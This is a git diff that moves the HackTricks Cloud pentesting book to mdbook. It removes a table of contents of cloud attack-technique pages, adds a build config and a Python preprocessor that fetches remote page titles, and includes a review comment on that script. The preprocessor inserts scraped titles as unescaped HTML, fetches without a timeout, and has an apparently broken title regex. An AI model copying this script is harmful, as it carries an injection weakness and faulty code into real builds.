- * [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md)
- * [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md)
- * [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md)
- * [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md)
- * [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md)
- * [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md)
- * [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md)
- * [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md)
- * [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md)
- * [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md)
- * [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md)
- * [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md)
- * [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md)
- * [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md)
- * [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md)
- * [AWS -
SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md)
- * [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md)
- * [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md)
- * [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md)
- * [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md)
- * [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md)
- * [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md)
- * [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md)
- * [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md)
- * [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md)
- * [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md)
- * [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md)
- * [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md)
- * [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md)
- * [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md)
- * [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md)
- * [AWS - Security Hub
Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md)
- * [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md)
- * [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md)
- * [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md)
- * [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md)
- * [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md)
- * [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md)
- * [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md)
- * [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md)
- * [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md)
- * [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md)
- * [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md)
- * [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md)
- * [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
- * [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md)
- * [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md)
- * [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md)
- * [AWS - EC2,
EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md)
- * [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md)
- * [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md)
- * [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md)
- * [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md)
- * [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md)
- * [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md)
- * [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md)
- * [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md)
- * [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md)
- * [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md)
- * [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md)
- * [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md)
- * [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md)
- * [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md)
- * [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md)
- * [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md)
- * [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md)
- * [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md)
- * [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md)
- * [AWS - Relational Database (RDS)
Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md)
- * [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md)
- * [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md)
- * [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md)
- * [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md)
- * [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md)
- * [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md)
- * [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md)
- * [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md)
- * [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md)
- * [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md)
- * [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md)
- * [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md)
- * [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md)
- * [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md)
- * [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
- * [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md)
- * [AWS - DynamoDB Unauthenticated
Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md)
- * [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md)
- * [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md)
- * [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md)
- * [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md)
- * [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md)
- * [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
- * [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
- * [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md)
- * [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md)
- * [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md)
- * [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md)
- * [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md)
- * [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md)
- * [AWS - RDS Unauthenticated
Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md)
- * [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md)
- * [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md)
- * [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md)
- * [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md)
-* [Azure Pentesting](pentesting-cloud/azure-security/README.md)
- * [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md)
- * [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md)
- * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md)
- * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md)
- * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md)
- * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md)
- * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
- * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
- * [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
- * [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
- * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
- * [Az - Application
Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
- * [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- * [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md)
- * [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md)
- * [Az - App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
- * [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md)
- * [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md)
- * [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md)
- * [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md)
- * [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md)
- * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md)
- * [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md)
- * [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md)
- * [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md)
- * [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md)
- * [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md)
- * [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md)
- * [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md)
- * [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
- * [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
- * [Az AD Connect - Hybrid
Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md) - * [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md) - * [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md) - * [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md) - * [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md) - * [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md) - * [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md) - * [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md) - * [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md) - * [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md) - * [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md) - * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) - * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) - * [Az - Phishing Primary Refresh Token (Microsoft 
Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) - * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) - * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) - * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - * [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) - * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) - * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) - * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) - * [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md) - * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) - * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) - * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) - * [Az - App Services 
Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) - * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) - * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) - * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - * [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) - * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) - * [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) - * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) - * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) - * [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) - * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) - * [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) - * [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) - * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) - * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) -* [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) - * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) - * [DO - Permissions for a 
Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) - * [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md) - * [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md) - * [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md) - * [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md) - * [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md) - * [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md) - * [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md) - * [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md) - * [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md) - * [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md) - * [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md) - * [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md) -* [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md) - * [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md) - * [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md) - * [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md) -* [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md) - * [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md) - * [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md) - * [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md) - * [OpenShift - Jenkins Build Pod 
Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md)
- * [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md)
- * [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md)
- * [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md)
- * [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md)
-
-## 🛫 Pentesting Network Services
-
-* [HackTricks Pentesting Network](https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network)
-* [HackTricks Pentesting Services](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh)
diff --git a/book.toml b/book.toml
new file mode 100644
index 000000000..4add3bde9
--- /dev/null
+++ b/book.toml
@@ -0,0 +1,44 @@
+[book]
+authors = ["Carlos Polop"]
+language = "en"
+multilingual = false
+src = "src"
+title = "HackTricks Cloud"
+
+[build]
+create-missing = false
+extra-watch-dirs = ["translations"]
+
+[preprocessor.alerts]
+after = ["links"]
+
+[preprocessor.reading-time]
+
+[preprocessor.pagetoc]
+
+[preprocessor.tabs]
+
+[preprocessor.codename]
+
+[preprocessor.hacktricks]
+command = "python3 ./hacktricks-preprocessor.py"
+
+[output.html]
+additional-css = ["theme/pagetoc.css", "theme/tabs.css"]
+additional-js = [
+ "theme/pagetoc.js",
+ "theme/tabs.js",
+ "theme/ht_searcher.js",
+ "theme/sponsor.js",
+]
+no-section-label = true
+preferred-dark-theme = "hacktricks-dark"
+default-theme = "hacktricks-light"
+
+[output.html.fold]
+enable = true # whether or not to enable section folding
+level = 0 # the depth to start folding
+
+
+[output.html.print]
+enable = false # whether or not to enable print
diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py
new file mode 100644
index 000000000..56a0cf0dc
--- /dev/null
+++ b/hacktricks-preprocessor.py
@@ -0,0 +1,106 @@
+import json
+import sys
+import re
+import logging
+from os import path
+from urllib.request import urlopen, Request
+
+logger = logging.getLogger(__name__)
+logging.basicConfig(filename='hacktricks-preprocessor.log', filemode='w', encoding='utf-8', level=logging.DEBUG)
+
+
+def findtitle(search ,obj, key, path=(),):
+ # logger.debug(f"Looking for {search} in {path}")
+ if isinstance(obj, dict) and key in obj and obj[key] == search:
+ return obj, path
+ if isinstance(obj, list):
+ for k, v in enumerate(obj):
+ item = findtitle(search, v, key, (*path, k))
+ if item is not None:
+ return item
+ if isinstance(obj, dict):
+ for k, v in obj.items():
+ item = findtitle(search, v, key, (*path, k))
+ if item is not None:
+ return item
+
+
+def ref(matchobj):
+ logger.debug(f'Match: {matchobj.groups(0)[0].strip()}')
+ href = matchobj.groups(0)[0].strip()
+ title = href
+ if href.startswith("http://") or href.startswith("https://"):
+ # pass
+ try:
+ raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read())
+ match = re.search('(.*?)', raw_html)
+ title = match.group(1) if match else href
+ except Exception as e:
+ logger.debug(f'Error opening URL {href}: {e}')
+ pass #nDont stop on broken link
+ else:
+ try:
+ if href.endswith("/"):
+ href = href+"README.md" # Fix if ref points to a folder
+ chapter, _path = findtitle(href, book, "source_path")
+ logger.debug(f'Recursive title search result: {chapter['name']}')
+ title = chapter['name']
+ except Exception as e:
+ try:
+ dir = path.dirname(current_chapter['source_path'])
+ logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}')
+ chapter, _path = findtitle(path.normpath(path.join(dir,href)), book, "source_path")
+ logger.debug(f'Recursive title search result: {chapter['name']}')
+ title = chapter['name']
+ except Exception as e:
+ logger.debug(f'Error
getting chapter title: {path.normpath(path.join(dir,href))}')
+ print(f'Error getting chapter title: {path.normpath(path.join(dir,href))}')
+ sys.exit(1)
+
+
+ template = f"""{title}"""
+
+ # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"})
+ # translated_text = template.translate(translate_table)
+ result = template
+
+ return result
+
+
+def iterate_chapters(sections):
+ if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section
+ return
+ elif isinstance(sections, dict) and "Chapter" in sections: # Is a chapter return it and look into sub items
+ # logger.debug(f"Chapter {sections['Chapter']}")
+ yield sections['Chapter']
+ yield from iterate_chapters(sections['Chapter']["sub_items"])
+ elif isinstance(sections, list): # Iterate through list when in sections and in sub_items
+ for k, v in enumerate(sections):
+ yield from iterate_chapters(v)
+
+
+if __name__ == '__main__':
+ global context, book, current_chapter
+ if len(sys.argv) > 1: # we check if we received any argument
+ if sys.argv[1] == "supports":
+ # then we are good to return an exit status code of 0, since the other argument will just be the renderer's name
+ sys.exit(0)
+ logger.debug('Started hacktricks preprocessor')
+ # load both the context and the book representations from stdin
+ context, book = json.load(sys.stdin)
+
+ logger.debug(f"Context: {context}")
+
+
+ for chapter in iterate_chapters(book['sections']):
+ logger.debug(f"Chapter: {chapter['path']}")
+ current_chapter = chapter
+ regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}'
+ new_content = re.sub(regex, ref, chapter['content'])
+ chapter['content'] = new_content
+
+ content = json.dumps(book)
+ logger.debug(content)
+
+
+ print(content)
\ No newline at end of file
diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
deleted file mode 100644
index 2508f970f..000000000
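Review bot: In `ref()` of hacktricks-preprocessor.py, the title scraped from a remote page is interpolated into `template` without escaping, so whatever a third-party site puts in its title becomes part of the chapter content that mdbook renders, and mdbook passes inline HTML through. The fetch on the `raw_html = ...` line also has no timeout and no size cap, and `str(...read())` yields the `b'...'` repr of the bytes rather than decoded text, so one slow or very large response can stall the build and non-ASCII titles come out as escape sequences. I would add `timeout=10` to the `urlopen(...)` call and read it as `.read(65536).decode('utf-8', errors='replace')`, then assign `title = html.escape(match.group(1)) if match else href` with `import html` at the top. Separately, the debug f-strings written as `f'... {chapter['name']}'` reuse the outer quote inside the replacement field, which only parses on Python 3.12 or later; using `chapter["name"]` inside them keeps the script runnable on older interpreters.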
--- a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md +++ /dev/null @@ -1,137 +0,0 @@ -# Airflow Configuration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
